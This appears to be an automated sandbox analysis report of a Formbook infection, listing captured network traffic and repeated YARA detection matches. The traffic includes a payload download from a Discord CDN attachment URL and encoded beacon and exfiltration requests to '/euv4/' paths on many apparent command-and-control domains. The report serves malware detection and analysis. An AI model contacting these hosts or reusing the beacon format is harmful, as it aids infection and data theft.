          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 18:06:17 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico%c0
          Source: systray.exe, 00000014.00000002.813138180.00000000052DB000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ahmadfaizlajis.com
          Source: systray.exe, 00000014.00000002.813138180.00000000052DB000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ahmadfaizlajis.com/euv4/
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp3
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp141
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/g
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngQcd
          Source: systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
          Source: unknownHTTP traffic detected: POST /euv4/ HTTP/1.1Host: www.mehfeels.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.mehfeels.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mehfeels.com/euv4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 58 78 58 6b 3d 66 44 7a 68 56 79 42 43 5a 54 41 62 35 72 56 62 62 76 4c 37 56 35 56 52 4f 67 64 45 42 64 35 49 70 42 7a 71 71 34 52 6d 50 50 5a 4e 39 46 4d 4b 53 41 34 42 4d 59 54 75 52 79 42 37 61 46 74 76 6d 73 43 62 45 53 77 76 57 75 57 54 6a 72 64 4e 73 32 38 53 7a 76 50 56 34 71 6b 35 77 75 76 6e 51 74 73 53 48 38 6f 6c 79 4e 6e 2d 48 45 34 44 51 4e 58 67 39 5f 32 38 50 76 7a 77 50 66 65 44 57 36 36 32 7a 62 63 6c 59 49 4c 34 53 42 57 73 69 48 4d 69 28 4f 6e 6f 4d 64 61 56 78 66 32 47 6e 75 70 31 6a 6c 51 4f 6b 65 61 52 6b 6c 69 49 44 33 56 78 6b 61 71 78 76 6a 41 74 4f 34 6b 77 4d 39 39 6d 44 2d 62 4a 6d 4b 43 6f 37 30 43 39 76 4b 78 39 69 63 4e 65 56 77 32 4e 73 67 78 50 41 4d 73 72 59 56 36 63 7a 48 73 6b 56 4e 49 77 47 62 6d 4f 6c 4c 70 64 4e 41 71 39 34 4f 36 57 4e 63 39 56 4b 53 61 4f 48 57 54 57 38 4b 6d 31 39 6c 6d 78 69 44 58 4e 56 4a 64 52 56 73 39 68 53 74 48 76 43 66 67 76 6f 44 50 55 79 61 59 53 6b 37 72 30 28 35 42 39 70 2d 7e 6a 56 77 65 46 55 77 78 54 75 4a 4d 2d 48 38 68 52 49 35 76 6f 47 43 57 56 34 5a 49 70 73 50 4f 36 39 34 6b 52 34 38 62 53 58 43 48 34 4b 72 4a 4c 31 39 4b 4f 54 5f 78 59 56 4f 39 6d 39 6d 39 70 30 66 7a 5a 65 2d 52 6f 64 53 45 59 49 74 39 4c 6e 66 74 49 54 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BXxXk=fDzhVyBCZTAb5rVbbvL7V5VROgdEBd5IpBzqq4RmPPZN9FMKSA4BMYTuRyB7aFtvmsCbESwvWuWTjrdNs28SzvPV4qk5wuvnQtsSH8olyNn-HE4DQNXg9_28PvzwPfeDW662zbclYIL4SBWsiHMi(OnoMdaVxf2Gnup1jlQOkeaRkliID3VxkaqxvjAtO4kwM99mD-bJmKCo70C9vKx9icNeVw2NsgxPAMsrYV6czHskVNIwGbmOlLpdNAq94O6WNc9VKSaOHWTW8Km19lmxiDXNVJdRVs9hStHvCfgvoDPUyaYSk7r0(5B9p-~jVweFUwxTuJM-H8hRI5voGCWV4ZIpsPO694kR48bSXCH4KrJL19KOT_xYVO9m9m9p0fzZe-RodSEYIt9LnftITg).
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: GET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1User-Agent: 9Host: cdn.discordapp.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1User-Agent: 20Host: cdn.discordapp.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnji HTTP/1.1User-Agent: 84Host: cdn.discordapp.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=85mQjwU+wMRs83r0GOSrcIreOiba9zyWW+CS0GLKbh9gHly9YGpiGKD2AN9MIjoCEE7/ HTTP/1.1Host: www.handejqr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=cI3g5knJJqXkP8IW+Xza8klzbxDoXV64MSKEiVzom8B632K++iscclio36YMg8rUOzdW&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.game2plays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsU HTTP/1.1Host: www.the-pumps.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.bendyourtongue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=oa9knNpzlYsET7a400NCf8AEb2m6hfIC7IipfrPHZRwez4UH0nI2ep6CPiEzZPUmbJ08 HTTP/1.1Host: www.librairie-adrienne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4Lehs HTTP/1.1Host: www.alifdanismanlik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.anniebapartments.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=cWiJLLMFkNIAGeNHPwohgYgPINYIsRPE+G/+VQN9zUpY6o9lKCFsb+tpXVk1tI7skOBU HTTP/1.1Host: www.20dzwww.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt HTTP/1.1Host: www.rematedeldia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=a7oTRd/pafA2z6myMPYHhwtmlIDdFKKQLm2w9Ocm2aQfWI2wtWEKtniCrep29h+E27Ao&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.t1uba.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj HTTP/1.1Host: www.bubu3cin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtY HTTP/1.1Host: www.bestpleasure4u.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1Host: www.cielotherepy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=rHTt4/gAXbFdLDnVce2ivV2H4joOeuBJUkkeDtonXvza2SG7LjkAPmebStjpTvpYTNdp HTTP/1.1Host: www.pkem.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj&x6VPE=5jf8Bvhx9 HTTP/1.1Host: www.bubu3cin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /euv4/?BXxXk=QBHbLVxXFBQ8vZs3HYaMEcVKayZ3Jv10zmSp74hjINFs4RkrUT15e8jtDg9xTHBGuf3s&nN6=6lpDqpn0n2Bl9fTP HTTP/1.1Host: www.mehfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49749 version: TLS 1.2

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 22.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 13.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
